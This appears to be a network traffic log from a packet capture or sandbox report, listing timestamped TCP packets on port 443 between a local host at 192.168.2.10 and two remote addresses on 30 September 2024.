Sep 30, 2024 18:20:15.636763096 CEST	443	49714	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:15.636791945 CEST	49714	443	192.168.2.10	188.114.97.3
Sep 30, 2024 18:20:15.636796951 CEST	443	49714	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:15.636822939 CEST	49714	443	192.168.2.10	188.114.97.3
Sep 30, 2024 18:20:15.703763962 CEST	443	49714	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:15.703790903 CEST	443	49714	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:15.703860998 CEST	49714	443	192.168.2.10	188.114.97.3
Sep 30, 2024 18:20:15.703869104 CEST	443	49714	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:15.703906059 CEST	49714	443	192.168.2.10	188.114.97.3
Sep 30, 2024 18:20:15.722661018 CEST	443	49714	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:15.722697973 CEST	443	49714	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:15.722743034 CEST	49714	443	192.168.2.10	188.114.97.3
Sep 30, 2024 18:20:15.722749949 CEST	443	49714	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:15.722783089 CEST	49714	443	192.168.2.10	188.114.97.3
Sep 30, 2024 18:20:15.723045111 CEST	443	49714	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:15.723059893 CEST	443	49714	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:15.723103046 CEST	49714	443	192.168.2.10	188.114.97.3
Sep 30, 2024 18:20:15.723113060 CEST	443	49714	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:15.723131895 CEST	49714	443	192.168.2.10	188.114.97.3
Sep 30, 2024 18:20:15.723459959 CEST	443	49714	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:15.723481894 CEST	443	49714	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:15.723519087 CEST	49714	443	192.168.2.10	188.114.97.3
Sep 30, 2024 18:20:15.723522902 CEST	443	49714	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:15.723553896 CEST	49714	443	192.168.2.10	188.114.97.3
Sep 30, 2024 18:20:15.723881960 CEST	443	49714	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:15.723897934 CEST	443	49714	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:15.724024057 CEST	49714	443	192.168.2.10	188.114.97.3
Sep 30, 2024 18:20:15.724030018 CEST	443	49714	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:15.724260092 CEST	443	49714	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:15.724281073 CEST	443	49714	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:15.724319935 CEST	49714	443	192.168.2.10	188.114.97.3
Sep 30, 2024 18:20:15.724324942 CEST	443	49714	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:15.724335909 CEST	49714	443	192.168.2.10	188.114.97.3
Sep 30, 2024 18:20:15.724941015 CEST	443	49714	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:15.724958897 CEST	443	49714	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:15.724996090 CEST	49714	443	192.168.2.10	188.114.97.3
Sep 30, 2024 18:20:15.725003958 CEST	443	49714	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:15.725033998 CEST	49714	443	192.168.2.10	188.114.97.3
Sep 30, 2024 18:20:15.725249052 CEST	443	49714	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:15.725269079 CEST	443	49714	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:15.725306988 CEST	49714	443	192.168.2.10	188.114.97.3
Sep 30, 2024 18:20:15.725311995 CEST	443	49714	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:15.725322962 CEST	49714	443	192.168.2.10	188.114.97.3
Sep 30, 2024 18:20:15.740858078 CEST	49714	443	192.168.2.10	188.114.97.3
Sep 30, 2024 18:20:15.792737007 CEST	443	49714	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:15.792762995 CEST	443	49714	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:15.792824030 CEST	49714	443	192.168.2.10	188.114.97.3
Sep 30, 2024 18:20:15.792840004 CEST	443	49714	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:15.792857885 CEST	49714	443	192.168.2.10	188.114.97.3
Sep 30, 2024 18:20:15.811379910 CEST	443	49714	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:15.811423063 CEST	443	49714	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:15.811456919 CEST	49714	443	192.168.2.10	188.114.97.3
Sep 30, 2024 18:20:15.811465979 CEST	443	49714	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:15.811496019 CEST	443	49714	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:15.811501980 CEST	49714	443	192.168.2.10	188.114.97.3
Sep 30, 2024 18:20:15.811573029 CEST	49714	443	192.168.2.10	188.114.97.3
Sep 30, 2024 18:20:15.811580896 CEST	443	49714	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:15.812038898 CEST	443	49714	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:15.812057972 CEST	443	49714	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:15.812092066 CEST	49714	443	192.168.2.10	188.114.97.3
Sep 30, 2024 18:20:15.812099934 CEST	443	49714	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:15.812133074 CEST	49714	443	192.168.2.10	188.114.97.3
Sep 30, 2024 18:20:15.812419891 CEST	443	49714	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:15.812434912 CEST	443	49714	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:15.812470913 CEST	49714	443	192.168.2.10	188.114.97.3
Sep 30, 2024 18:20:15.812478065 CEST	443	49714	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:15.812504053 CEST	49714	443	192.168.2.10	188.114.97.3
Sep 30, 2024 18:20:15.813143015 CEST	443	49714	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:15.813162088 CEST	443	49714	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:15.813195944 CEST	49714	443	192.168.2.10	188.114.97.3
Sep 30, 2024 18:20:15.813203096 CEST	443	49714	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:15.813239098 CEST	49714	443	192.168.2.10	188.114.97.3
Sep 30, 2024 18:20:15.813601971 CEST	443	49714	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:15.813616037 CEST	443	49714	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:15.813653946 CEST	49714	443	192.168.2.10	188.114.97.3
Sep 30, 2024 18:20:15.813658953 CEST	443	49714	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:15.813673973 CEST	49714	443	192.168.2.10	188.114.97.3
Sep 30, 2024 18:20:15.813934088 CEST	443	49714	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:15.813951015 CEST	443	49714	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:15.813982964 CEST	49714	443	192.168.2.10	188.114.97.3
Sep 30, 2024 18:20:15.813990116 CEST	443	49714	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:15.814018011 CEST	49714	443	192.168.2.10	188.114.97.3
Sep 30, 2024 18:20:15.874547005 CEST	49714	443	192.168.2.10	188.114.97.3
Sep 30, 2024 18:20:15.881263971 CEST	443	49714	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:15.881289005 CEST	443	49714	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:15.881345987 CEST	49714	443	192.168.2.10	188.114.97.3
Sep 30, 2024 18:20:15.881360054 CEST	443	49714	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:15.881388903 CEST	49714	443	192.168.2.10	188.114.97.3
Sep 30, 2024 18:20:15.881396055 CEST	49714	443	192.168.2.10	188.114.97.3
Sep 30, 2024 18:20:15.899840117 CEST	443	49714	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:15.899863958 CEST	443	49714	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:15.899941921 CEST	49714	443	192.168.2.10	188.114.97.3
Sep 30, 2024 18:20:15.899952888 CEST	443	49714	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:15.899997950 CEST	49714	443	192.168.2.10	188.114.97.3
Sep 30, 2024 18:20:15.900120974 CEST	443	49714	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:15.900136948 CEST	443	49714	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:15.900182009 CEST	49714	443	192.168.2.10	188.114.97.3
Sep 30, 2024 18:20:15.900187969 CEST	443	49714	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:15.900223970 CEST	49714	443	192.168.2.10	188.114.97.3
Sep 30, 2024 18:20:15.900580883 CEST	443	49714	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:15.900594950 CEST	443	49714	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:15.900630951 CEST	49714	443	192.168.2.10	188.114.97.3
Sep 30, 2024 18:20:15.900638103 CEST	443	49714	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:15.900661945 CEST	49714	443	192.168.2.10	188.114.97.3
Sep 30, 2024 18:20:15.900677919 CEST	49714	443	192.168.2.10	188.114.97.3
Sep 30, 2024 18:20:15.900959015 CEST	443	49714	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:15.900973082 CEST	443	49714	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:15.901015043 CEST	49714	443	192.168.2.10	188.114.97.3
Sep 30, 2024 18:20:15.901021004 CEST	443	49714	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:15.901057005 CEST	49714	443	192.168.2.10	188.114.97.3
Sep 30, 2024 18:20:15.901382923 CEST	443	49714	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:15.901398897 CEST	443	49714	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:15.901442051 CEST	49714	443	192.168.2.10	188.114.97.3
Sep 30, 2024 18:20:15.901449919 CEST	443	49714	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:15.901485920 CEST	49714	443	192.168.2.10	188.114.97.3
Sep 30, 2024 18:20:15.901830912 CEST	443	49714	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:15.901846886 CEST	443	49714	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:15.901884079 CEST	49714	443	192.168.2.10	188.114.97.3
Sep 30, 2024 18:20:15.901890039 CEST	443	49714	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:15.901913881 CEST	49714	443	192.168.2.10	188.114.97.3
Sep 30, 2024 18:20:15.901928902 CEST	49714	443	192.168.2.10	188.114.97.3
Sep 30, 2024 18:20:15.902340889 CEST	443	49714	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:15.902357101 CEST	443	49714	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:15.902401924 CEST	49714	443	192.168.2.10	188.114.97.3
Sep 30, 2024 18:20:15.902409077 CEST	443	49714	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:15.902422905 CEST	49714	443	192.168.2.10	188.114.97.3
Sep 30, 2024 18:20:15.902452946 CEST	49714	443	192.168.2.10	188.114.97.3
Sep 30, 2024 18:20:15.969799042 CEST	443	49714	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:15.969825983 CEST	443	49714	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:15.969892025 CEST	49714	443	192.168.2.10	188.114.97.3
Sep 30, 2024 18:20:15.969907999 CEST	443	49714	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:15.969923019 CEST	49714	443	192.168.2.10	188.114.97.3
Sep 30, 2024 18:20:15.969943047 CEST	49714	443	192.168.2.10	188.114.97.3
Sep 30, 2024 18:20:15.988785028 CEST	443	49714	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:15.988814116 CEST	443	49714	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:15.988868952 CEST	49714	443	192.168.2.10	188.114.97.3
Sep 30, 2024 18:20:15.988878965 CEST	443	49714	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:15.988904953 CEST	49714	443	192.168.2.10	188.114.97.3
Sep 30, 2024 18:20:15.988920927 CEST	49714	443	192.168.2.10	188.114.97.3
Sep 30, 2024 18:20:15.989022017 CEST	443	49714	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:15.989037037 CEST	443	49714	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:15.989090919 CEST	49714	443	192.168.2.10	188.114.97.3
Sep 30, 2024 18:20:15.989097118 CEST	443	49714	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:15.989131927 CEST	49714	443	192.168.2.10	188.114.97.3
Sep 30, 2024 18:20:15.989450932 CEST	443	49714	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:15.989468098 CEST	443	49714	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:15.989505053 CEST	49714	443	192.168.2.10	188.114.97.3
Sep 30, 2024 18:20:15.989511013 CEST	443	49714	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:15.989533901 CEST	49714	443	192.168.2.10	188.114.97.3
Sep 30, 2024 18:20:15.989547968 CEST	49714	443	192.168.2.10	188.114.97.3
Sep 30, 2024 18:20:15.989924908 CEST	443	49714	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:15.989932060 CEST	443	49714	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:15.989991903 CEST	49714	443	192.168.2.10	188.114.97.3
Sep 30, 2024 18:20:15.989999056 CEST	443	49714	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:15.990039110 CEST	49714	443	192.168.2.10	188.114.97.3
Sep 30, 2024 18:20:15.990304947 CEST	443	49714	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:15.990313053 CEST	443	49714	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:15.990493059 CEST	49714	443	192.168.2.10	188.114.97.3
Sep 30, 2024 18:20:15.990499973 CEST	443	49714	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:15.990540028 CEST	49714	443	192.168.2.10	188.114.97.3
Sep 30, 2024 18:20:15.990621090 CEST	443	49714	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:15.990679026 CEST	49714	443	192.168.2.10	188.114.97.3
Sep 30, 2024 18:20:15.990683079 CEST	443	49714	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:15.990693092 CEST	443	49714	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:15.990745068 CEST	49714	443	192.168.2.10	188.114.97.3
Sep 30, 2024 18:20:16.004332066 CEST	49714	443	192.168.2.10	188.114.97.3
Sep 30, 2024 18:20:16.004354000 CEST	443	49714	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:17.702080011 CEST	49715	443	192.168.2.10	104.102.49.254
Sep 30, 2024 18:20:17.702126026 CEST	443	49715	104.102.49.254	192.168.2.10
Sep 30, 2024 18:20:17.702197075 CEST	49715	443	192.168.2.10	104.102.49.254
Sep 30, 2024 18:20:17.703511000 CEST	49715	443	192.168.2.10	104.102.49.254
Sep 30, 2024 18:20:17.703524113 CEST	443	49715	104.102.49.254	192.168.2.10
Sep 30, 2024 18:20:18.321069002 CEST	49718	443	192.168.2.10	188.114.97.3
Sep 30, 2024 18:20:18.321114063 CEST	443	49718	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:18.321187019 CEST	49718	443	192.168.2.10	188.114.97.3
Sep 30, 2024 18:20:18.358335972 CEST	443	49715	104.102.49.254	192.168.2.10
Sep 30, 2024 18:20:18.358422995 CEST	49715	443	192.168.2.10	104.102.49.254
Sep 30, 2024 18:20:18.379381895 CEST	49715	443	192.168.2.10	104.102.49.254
Sep 30, 2024 18:20:18.379404068 CEST	443	49715	104.102.49.254	192.168.2.10
Sep 30, 2024 18:20:18.379724979 CEST	443	49715	104.102.49.254	192.168.2.10
Sep 30, 2024 18:20:18.381671906 CEST	49718	443	192.168.2.10	188.114.97.3
Sep 30, 2024 18:20:18.381684065 CEST	443	49718	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:18.483906031 CEST	49715	443	192.168.2.10	104.102.49.254
Sep 30, 2024 18:20:18.512185097 CEST	49715	443	192.168.2.10	104.102.49.254
Sep 30, 2024 18:20:18.555406094 CEST	443	49715	104.102.49.254	192.168.2.10
Sep 30, 2024 18:20:18.840945959 CEST	443	49718	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:18.841135025 CEST	49718	443	192.168.2.10	188.114.97.3
Sep 30, 2024 18:20:18.843209028 CEST	49718	443	192.168.2.10	188.114.97.3
Sep 30, 2024 18:20:18.843223095 CEST	443	49718	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:18.843616962 CEST	443	49718	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:18.863759995 CEST	49718	443	192.168.2.10	188.114.97.3
Sep 30, 2024 18:20:18.907399893 CEST	443	49718	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:18.989557981 CEST	443	49718	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:18.989624023 CEST	443	49718	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:18.989666939 CEST	443	49718	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:18.989680052 CEST	49718	443	192.168.2.10	188.114.97.3
Sep 30, 2024 18:20:18.989701033 CEST	443	49718	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:18.989741087 CEST	443	49718	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:18.989778996 CEST	443	49718	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:18.989783049 CEST	49718	443	192.168.2.10	188.114.97.3
Sep 30, 2024 18:20:18.989795923 CEST	443	49718	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:18.989869118 CEST	443	49718	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:18.989886045 CEST	49718	443	192.168.2.10	188.114.97.3
Sep 30, 2024 18:20:18.989893913 CEST	443	49718	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:18.989929914 CEST	49718	443	192.168.2.10	188.114.97.3
Sep 30, 2024 18:20:18.989938021 CEST	443	49718	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:18.990062952 CEST	49718	443	192.168.2.10	188.114.97.3
Sep 30, 2024 18:20:18.990068913 CEST	443	49718	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:18.997417927 CEST	443	49718	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:18.997734070 CEST	49718	443	192.168.2.10	188.114.97.3
Sep 30, 2024 18:20:18.997746944 CEST	443	49718	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:19.076031923 CEST	443	49718	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:19.076078892 CEST	443	49718	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:19.076098919 CEST	49718	443	192.168.2.10	188.114.97.3
Sep 30, 2024 18:20:19.076117039 CEST	443	49718	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:19.076154947 CEST	49718	443	192.168.2.10	188.114.97.3
Sep 30, 2024 18:20:19.076162100 CEST	443	49718	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:19.076241016 CEST	443	49718	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:19.076281071 CEST	443	49718	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:19.076284885 CEST	49718	443	192.168.2.10	188.114.97.3
Sep 30, 2024 18:20:19.076294899 CEST	443	49718	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:19.076330900 CEST	49718	443	192.168.2.10	188.114.97.3
Sep 30, 2024 18:20:19.076338053 CEST	443	49718	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:19.076878071 CEST	443	49718	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:19.077023029 CEST	49718	443	192.168.2.10	188.114.97.3
Sep 30, 2024 18:20:19.077027082 CEST	443	49718	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:19.077040911 CEST	443	49718	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:19.077116013 CEST	443	49718	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:19.077136993 CEST	49718	443	192.168.2.10	188.114.97.3
Sep 30, 2024 18:20:19.077143908 CEST	443	49718	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:19.077255964 CEST	49718	443	192.168.2.10	188.114.97.3
Sep 30, 2024 18:20:19.077666044 CEST	443	49718	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:19.077805042 CEST	443	49718	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:19.077841043 CEST	443	49718	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:19.077898026 CEST	49718	443	192.168.2.10	188.114.97.3
Sep 30, 2024 18:20:19.077904940 CEST	443	49718	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:19.078028917 CEST	49718	443	192.168.2.10	188.114.97.3
Sep 30, 2024 18:20:19.079658031 CEST	443	49718	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:19.079720020 CEST	443	49718	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:19.079782009 CEST	443	49718	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:19.079786062 CEST	49718	443	192.168.2.10	188.114.97.3
Sep 30, 2024 18:20:19.079802990 CEST	443	49718	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:19.079874992 CEST	443	49718	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:19.079916954 CEST	49718	443	192.168.2.10	188.114.97.3
Sep 30, 2024 18:20:19.079922915 CEST	443	49718	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:19.080065966 CEST	49718	443	192.168.2.10	188.114.97.3
Sep 30, 2024 18:20:19.080074072 CEST	443	49718	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:19.106508970 CEST	443	49715	104.102.49.254	192.168.2.10
Sep 30, 2024 18:20:19.106542110 CEST	443	49715	104.102.49.254	192.168.2.10
Sep 30, 2024 18:20:19.106549025 CEST	443	49715	104.102.49.254	192.168.2.10
Sep 30, 2024 18:20:19.106570005 CEST	443	49715	104.102.49.254	192.168.2.10
Sep 30, 2024 18:20:19.106580973 CEST	443	49715	104.102.49.254	192.168.2.10
Sep 30, 2024 18:20:19.106592894 CEST	49715	443	192.168.2.10	104.102.49.254
Sep 30, 2024 18:20:19.106597900 CEST	443	49715	104.102.49.254	192.168.2.10
Sep 30, 2024 18:20:19.106653929 CEST	49715	443	192.168.2.10	104.102.49.254
Sep 30, 2024 18:20:19.179111958 CEST	443	49718	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:19.179173946 CEST	443	49718	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:19.179249048 CEST	49718	443	192.168.2.10	188.114.97.3
Sep 30, 2024 18:20:19.179270029 CEST	443	49718	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:19.179332018 CEST	443	49718	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:19.179409981 CEST	49718	443	192.168.2.10	188.114.97.3
Sep 30, 2024 18:20:19.179418087 CEST	443	49718	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:19.179446936 CEST	443	49718	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:19.179487944 CEST	443	49718	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:19.179492950 CEST	49718	443	192.168.2.10	188.114.97.3
Sep 30, 2024 18:20:19.179501057 CEST	443	49718	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:19.179516077 CEST	443	49718	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:19.179533005 CEST	49718	443	192.168.2.10	188.114.97.3
Sep 30, 2024 18:20:19.179549932 CEST	49718	443	192.168.2.10	188.114.97.3
Sep 30, 2024 18:20:19.179614067 CEST	443	49718	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:19.179658890 CEST	443	49718	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:19.179701090 CEST	49718	443	192.168.2.10	188.114.97.3
Sep 30, 2024 18:20:19.179707050 CEST	443	49718	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:19.179843903 CEST	443	49718	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:19.179893017 CEST	49718	443	192.168.2.10	188.114.97.3
Sep 30, 2024 18:20:19.179899931 CEST	443	49718	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:19.179910898 CEST	443	49718	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:19.179969072 CEST	443	49718	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:19.179971933 CEST	49718	443	192.168.2.10	188.114.97.3
Sep 30, 2024 18:20:19.179982901 CEST	443	49718	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:19.180025101 CEST	443	49718	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:19.180046082 CEST	49718	443	192.168.2.10	188.114.97.3
Sep 30, 2024 18:20:19.180074930 CEST	49718	443	192.168.2.10	188.114.97.3
Sep 30, 2024 18:20:19.180079937 CEST	443	49718	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:19.180120945 CEST	49718	443	192.168.2.10	188.114.97.3
Sep 30, 2024 18:20:19.180506945 CEST	443	49718	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:19.180550098 CEST	443	49718	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:19.180576086 CEST	49718	443	192.168.2.10	188.114.97.3
Sep 30, 2024 18:20:19.180581093 CEST	443	49718	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:19.180594921 CEST	49718	443	192.168.2.10	188.114.97.3
Sep 30, 2024 18:20:19.180604935 CEST	443	49718	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:19.180622101 CEST	49718	443	192.168.2.10	188.114.97.3
Sep 30, 2024 18:20:19.180628061 CEST	443	49718	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:19.180722952 CEST	49718	443	192.168.2.10	188.114.97.3
Sep 30, 2024 18:20:19.181070089 CEST	443	49718	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:19.181119919 CEST	49718	443	192.168.2.10	188.114.97.3
Sep 30, 2024 18:20:19.181124926 CEST	443	49718	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:19.181258917 CEST	443	49718	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:19.181318998 CEST	49718	443	192.168.2.10	188.114.97.3
Sep 30, 2024 18:20:19.181324959 CEST	443	49718	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:19.181338072 CEST	443	49718	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:19.181401014 CEST	49718	443	192.168.2.10	188.114.97.3
Sep 30, 2024 18:20:19.181408882 CEST	443	49718	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:19.184228897 CEST	443	49718	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:19.184304953 CEST	49718	443	192.168.2.10	188.114.97.3
Sep 30, 2024 18:20:19.184314966 CEST	443	49718	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:19.210352898 CEST	443	49715	104.102.49.254	192.168.2.10
Sep 30, 2024 18:20:19.210367918 CEST	443	49715	104.102.49.254	192.168.2.10
Sep 30, 2024 18:20:19.210387945 CEST	443	49715	104.102.49.254	192.168.2.10
Sep 30, 2024 18:20:19.210429907 CEST	443	49715	104.102.49.254	192.168.2.10
Sep 30, 2024 18:20:19.210448980 CEST	49715	443	192.168.2.10	104.102.49.254
Sep 30, 2024 18:20:19.210454941 CEST	443	49715	104.102.49.254	192.168.2.10
Sep 30, 2024 18:20:19.210494995 CEST	49715	443	192.168.2.10	104.102.49.254
Sep 30, 2024 18:20:19.210494995 CEST	49715	443	192.168.2.10	104.102.49.254
Sep 30, 2024 18:20:19.216161013 CEST	443	49715	104.102.49.254	192.168.2.10
Sep 30, 2024 18:20:19.216217041 CEST	49715	443	192.168.2.10	104.102.49.254
Sep 30, 2024 18:20:19.216227055 CEST	443	49715	104.102.49.254	192.168.2.10
Sep 30, 2024 18:20:19.216268063 CEST	443	49715	104.102.49.254	192.168.2.10
Sep 30, 2024 18:20:19.216427088 CEST	49715	443	192.168.2.10	104.102.49.254
Sep 30, 2024 18:20:19.264691114 CEST	49715	443	192.168.2.10	104.102.49.254
Sep 30, 2024 18:20:19.264729977 CEST	443	49715	104.102.49.254	192.168.2.10
Sep 30, 2024 18:20:19.265177965 CEST	49718	443	192.168.2.10	188.114.97.3
Sep 30, 2024 18:20:19.266086102 CEST	443	49718	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:19.266098022 CEST	443	49718	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:19.266149044 CEST	49718	443	192.168.2.10	188.114.97.3
Sep 30, 2024 18:20:19.266155958 CEST	443	49718	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:19.266172886 CEST	443	49718	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:19.266211987 CEST	443	49718	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:19.266220093 CEST	49718	443	192.168.2.10	188.114.97.3
Sep 30, 2024 18:20:19.266220093 CEST	49718	443	192.168.2.10	188.114.97.3
Sep 30, 2024 18:20:19.266232967 CEST	443	49718	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:19.266247034 CEST	49718	443	192.168.2.10	188.114.97.3
Sep 30, 2024 18:20:19.266350031 CEST	443	49718	188.114.97.3	192.168.2.10
